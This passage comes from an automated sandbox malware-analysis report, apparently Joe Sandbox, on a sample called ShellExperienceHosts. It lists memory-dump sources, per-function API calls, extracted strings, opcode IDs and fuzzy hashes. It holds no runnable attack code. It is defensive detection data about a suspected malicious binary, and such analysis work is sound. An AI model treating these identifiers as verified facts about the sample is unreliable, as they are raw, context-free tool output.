                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyHeap
                                                                            • String ID: fI$fI
                                                                            • API String ID: 2435110975-2386055794
                                                                            • Opcode ID: bdc97b96a3807c9266f3fe4090c2a4bc76fdaafa984d6d893863179511533786
                                                                            • Instruction ID: 56057d1187cf719baf002346cee3f3a313ad225b11a255a7744d71810006c148
                                                                            • Opcode Fuzzy Hash: bdc97b96a3807c9266f3fe4090c2a4bc76fdaafa984d6d893863179511533786
                                                                            • Instruction Fuzzy Hash: AB21A57860C250DFCB929F49D4897097BF0AB56319F584D5AE580EB720C332E8E0CB97
                                                                            Function 6C6B6F14 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EnableWindow
                                                                            • String ID: SMn$$TMn$
                                                                            • API String ID: 4266128931-2548786147
                                                                            • Opcode ID: 4fe231984b077b7dad2e8300571f0753f3ce6a16a71e068e0c64f8d0e0bbc3aa
                                                                            • Instruction ID: 3548ce9138cd0fca695d82d499a5c773796d5c3c3ab85d9390710caf461fe8b6
                                                                            • Opcode Fuzzy Hash: 4fe231984b077b7dad2e8300571f0753f3ce6a16a71e068e0c64f8d0e0bbc3aa
                                                                            • Instruction Fuzzy Hash: F0214975219200DFC6199F1DC480849B7FAEF8A314F144A1EE598EB720E235EC21CB1B
                                                                            Function 6C74482C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadIconW.USER32(?,?), ref: 6C744844
                                                                            • GetClassInfoW.USER32(?,00000000,'@ol), ref: 6C744893
                                                                              • Part of subcall function 6C73D5E6: __snprintf_s.LIBCMT ref: 6C73D632
                                                                              • Part of subcall function 6C73D5E6: GetClassInfoW.USER32(?,0000007C,?), ref: 6C73D696
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassInfo$IconLoad__snprintf_s
                                                                            • String ID: '@ol
                                                                            • API String ID: 247674639-3394936640
                                                                            • Opcode ID: 69921ea17cf9e1183f5fd768d60694129a64fd0e2b5d3733f49dc2dd5b86bd3c
                                                                            • Instruction ID: e27b0bae230e75777e92faf53afdabf02d2bea7b16d70dcd0aba063e0ee1bd10
                                                                            • Opcode Fuzzy Hash: 69921ea17cf9e1183f5fd768d60694129a64fd0e2b5d3733f49dc2dd5b86bd3c
                                                                            • Instruction Fuzzy Hash: 0E117035A00658AFDB019FE5D948EEEBBB8AF48718F104039F901A7654DB30D944DBA0
                                                                            Function 02236FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __output_l.LIBCMT ref: 02236FFC
                                                                              • Part of subcall function 022370E4: __getptd_noexit.LIBCMT ref: 022370E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__output_l
                                                                            • String ID: B
                                                                            • API String ID: 2141734944-1255198513
                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                            • Instruction ID: 2d0bf3c565865c4d4afde1d4d7747354eff1402ad56c81c2cbaf84e4d6630e88
                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                            • Instruction Fuzzy Hash: 3A016DB291424EABDF129FE4CC01BEEBBF9FB04364F004156F924A6284E7749501CBA5
                                                                            Function 031AF179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __output_l.LIBCMT ref: 031AF1D4
                                                                              • Part of subcall function 031AF2DA: __getptd_noexit.LIBCMT ref: 031AF2DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__output_l
                                                                            • String ID: B
                                                                            • API String ID: 2141734944-1255198513
                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                            • Instruction ID: 0ba887411851879ad96e6f89b2ed08bcd19031e41d9a7cba2d91ec5190050325
                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                            • Instruction Fuzzy Hash: 1D016D75E00249ABDF10DFA8CC41AEEBBB8FB08365F144125E824AA280D7749502CBA1
                                                                            Function 02243414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CallFrame@12Setting__getptd
                                                                            • String ID: j
                                                                            • API String ID: 3454690891-2137352139
                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                            • Instruction ID: 4265ed27aa2a05235c1775b86741acd3d7ce082d675ae58b5082f51741cf379e
                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                            • Instruction Fuzzy Hash: 9A118071C24265EFCB16EF98C4443ECBB71BF01728FA480C9D4552B586CBB56991CF91
                                                                            Function 022437A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 022437AF
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 022437BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction ID: a5d9bbcaeae0b0cf5b960fad7c1818a38d1c69694ec9a70b6b84a7322fedcf1e
                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction Fuzzy Hash: 0B016D75820306CBCF3EEFA1C444AACB3B6BF04215FB488ADD45196254DF708980DF51
                                                                            Function 031C0093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 031C00A2
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031C00B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                            • Instruction ID: af4b9e2ed016fd0f1ecf72d5ac46aed9fe1de68c92f9aa2088d8028e9d5d1023
                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                            • Instruction Fuzzy Hash: 79014B38910345CBCF38DF65C8406ADF7B9AF2C215F58856ED0C1AA650CF34D9A5CB01
                                                                            Function 100137C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132B4
                                                                              • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132C4
                                                                            • __getptd.LIBCMT ref: 100137D8
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 100137E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction ID: 7ab74b7057de6af6c41b09604486a57fd509075c87a44dfcf8772f30d13ae725
                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction Fuzzy Hash: 2001283A8013468FDB24DF26C44069CB3F6FF00651F51842DF4955A6A1CF34EAD1CA11
                                                                            Function 6C774D5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C774D64
                                                                            • FindResourceW.KERNEL32(?,?,STYLE_XML,?,00000000,00000004,6C6D45E3,00000002,00000000,00000003,00000001,?,?,00000000,00000000,0000007E), ref: 6C774DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: FindH_prolog3Resource
                                                                            • String ID: STYLE_XML
                                                                            • API String ID: 3036663282-3909253476
                                                                            • Opcode ID: c843a75dfe5b9dc27caf4a401da6b9babb1f359ca3004d4c1e548d4115d88471
                                                                            • Instruction ID: 6d335b7d5a30868170fc8e8521d3ef405f8966ea90b31f6c8bbd3110c4bbef89
                                                                            • Opcode Fuzzy Hash: c843a75dfe5b9dc27caf4a401da6b9babb1f359ca3004d4c1e548d4115d88471
                                                                            • Instruction Fuzzy Hash: 2BF0A475A001189B9F20ABA18F4C9AEB27CFF4A35AB044536E26197A40C730C805EFB1
                                                                            Function 0040710B Relevance: 5.0, Strings: 4, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3541485259.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.3541444131.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.0000000000414000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.0000000000456000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541795510.000000000049F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h3A$l3A$p3A$t3A
                                                                            • API String ID: 0-422395243
                                                                            • Opcode ID: 323ff9953e1600890f904706cadf687cbd5e63ac7881b1e7a3b936ad8b4e984c
                                                                            • Instruction ID: 0d0a6c218b558ce51a144ca132cdf3fd2609f9de01a02927fca728c9dddb9a1a
                                                                            • Opcode Fuzzy Hash: 323ff9953e1600890f904706cadf687cbd5e63ac7881b1e7a3b936ad8b4e984c
                                                                            • Instruction Fuzzy Hash: 59E0B632A9C50E268A158DBC210C4663A8CD291719B084173B45CEEFA4D92AEF90D08D